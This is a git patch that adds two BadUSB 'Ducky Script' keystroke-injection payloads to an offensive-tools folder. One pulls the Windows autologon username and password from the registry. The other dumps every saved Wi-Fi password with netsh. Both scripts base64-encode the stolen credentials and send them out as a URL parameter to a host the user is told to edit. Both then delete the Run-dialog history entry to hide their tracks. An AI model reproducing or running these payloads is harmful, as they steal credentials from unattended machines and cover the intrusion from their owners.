From 81fa732adec683f3a5ad56521d12102dc8d57fde Mon Sep 17 00:00:00 2001 From: Zarcolio Date: Thu, 27 Jul 2023 16:55:04 +0200 Subject: [PATCH] Add files via upload --- .../Offensive/Exfill-Default-Pwd-Windows.txt | 29 +++++++++++++++++++ .../Offensive/Exfill-Wifi-Pwd-Win10.txt | 29 +++++++++++++++++++ 2 files changed, 58 insertions(+) create mode 100644 BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt create mode 100644 BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt diff --git a/BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt b/BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt new file mode 100644 index 0000000..6b16c39 --- /dev/null +++ b/BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt @@ -0,0 +1,29 @@ +REM _..._ .-'''-. .-'''-. +REM .-'_..._''. ' _ \ .---. ' _ \ +REM /| .' .' '.\/ /` '. \ | |.--. / /` '. \ +REM || .-. .- / .' . | \ ' | ||__|. | \ ' +REM || \ \ / / .-,.--. . ' | ' | '| |.--.| ' | ' +REM || __ \ \ / / __ | .-. || | \ \ / / | || |\ \ / / +REM ||/'__ '.\ \ / / .--------. .:--.'. | | | || | `. ` ..' / | || | `. ` ..' / +REM |:/` '. '\ \ / / |____ | / | \ | | | | |. ' '-...-'` | || | '-...-'` +REM || | | \ ` / / / `" __ | | | | '- \ '. . | || | +REM ||\ / ' \ / .' / .'.''| | | | '. `._____.-'/ | ||__| +REM |/\'..' / / / / /___ / / | |_| | `-.______ / '---' +REM ' `'-'`|`-' / | |\ \._,\ '/|_| ` +REM '..' |_________| `--' `" + +REM Steals HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword +REM Exfills it via http://127.0.0.1 (edit this) +REM Cleans up last opened MRU listing ("powershell") +REM Press button to close MS Edge. + +DELAY 1000 +GUI r +DELAY 1000 +STRING powershell +ENTER +DELAY 2000 +ALTCODE $a=(Get-ItemPropertyValue "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultUserName" -ErrorAction SilentlyContinue);$b=(Get-ItemPropertyValue "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultPassword" -ErrorAction SilentlyContinue);if($a -and $b -and $b.Trim() -ne ''){$c=[System.Text.Encoding]::Unicode.GetBytes($a);$d=[System.Text.Encoding]::Unicode.GetBytes($b);$e=$c+[System.Text.Encoding]::Unicode.GetBytes(":")+$d;$f=[Convert]::ToBase64String($e);Write-Output "DefaultUsername: $a";Write-Output "DefaultPassword: $b";Start-Process "microsoft-edge:http://127.0.0.1?secret=$f"}else{Write-Output "Default credentials not found in the registry or are empty."};$g=[Microsoft.Win32.Registry]::CurrentUser;$h='Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU';$i=$g.OpenSubKey($h,$true);if($i -ne $null){$j=$i.GetValueNames();if($j.Length -gt 0){$k=$j[$j.Length-1];$i.DeleteValue($k)}};Exit +ENTER +WAIT_FOR_BUTTON_PRESS +ALT F4 diff --git a/BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt b/BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt new file mode 100644 index 0000000..97e7d11 --- /dev/null +++ b/BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt @@ -0,0 +1,29 @@ +REM _..._ .-'''-. .-'''-. +REM .-'_..._''. ' _ \ .---. ' _ \ +REM /| .' .' '.\/ /` '. \ | |.--. / /` '. \ +REM || .-. .- / .' . | \ ' | ||__|. | \ ' +REM || \ \ / / .-,.--. . ' | ' | '| |.--.| ' | ' +REM || __ \ \ / / __ | .-. || | \ \ / / | || |\ \ / / +REM ||/'__ '.\ \ / / .--------. .:--.'. | | | || | `. ` ..' / | || | `. ` ..' / +REM |:/` '. '\ \ / / |____ | / | \ | | | | |. ' '-...-'` | || | '-...-'` +REM || | | \ ` / / / `" __ | | | | '- \ '. . | || | +REM ||\ / ' \ / .' / .'.''| | | | '. `._____.-'/ | ||__| +REM |/\'..' / / / / /___ / / | |_| | `-.______ / '---' +REM ' `'-'`|`-' / | |\ \._,\ '/|_| ` +REM '..' |_________| `--' `" + +REM Steals wifi passwords (uptil win10, win11 needs admin for all passwords) +REM Exfills it via http://127.0.0.1 (edit this) +REM Cleans up last opened MRU listing ("powershell") +REM Press button to close MS Edge. + +DELAY 1000 +GUI r +DELAY 1000 +STRING powershell +ENTER +DELAY 2000 +ALTCODE $base64output=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(((netsh wlan show profiles|Select-String "All User Profile\s+:\s+(.+)$"|ForEach-Object{$_.Matches.Groups[1].Value})|ForEach-Object{ "Wifi: $_`r`n";netsh wlan show profile name=$_ key=clear|Select-String "Key Content\s+:\s+(.+)$"|ForEach-Object{"Password: $($_.Matches.Groups[1].Value)`r`n"}})-join ""));Start-Process "microsoft-edge:http://127.0.0.1?secret=$base64output";$HKCU = [Microsoft.Win32.Registry]::CurrentUser; $RunMRU = 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'; $RunMRUKey = $HKCU.OpenSubKey($RunMRU, $true); if ($RunMRUKey -ne $null) { $values = $RunMRUKey.GetValueNames(); if ($values.Length -gt 0) { $lastValue = $values[$values.Length - 1]; $RunMRUKey.DeleteValue($lastValue)}};Exit +ENTER +WAIT_FOR_BUTTON_PRESS +ALT F4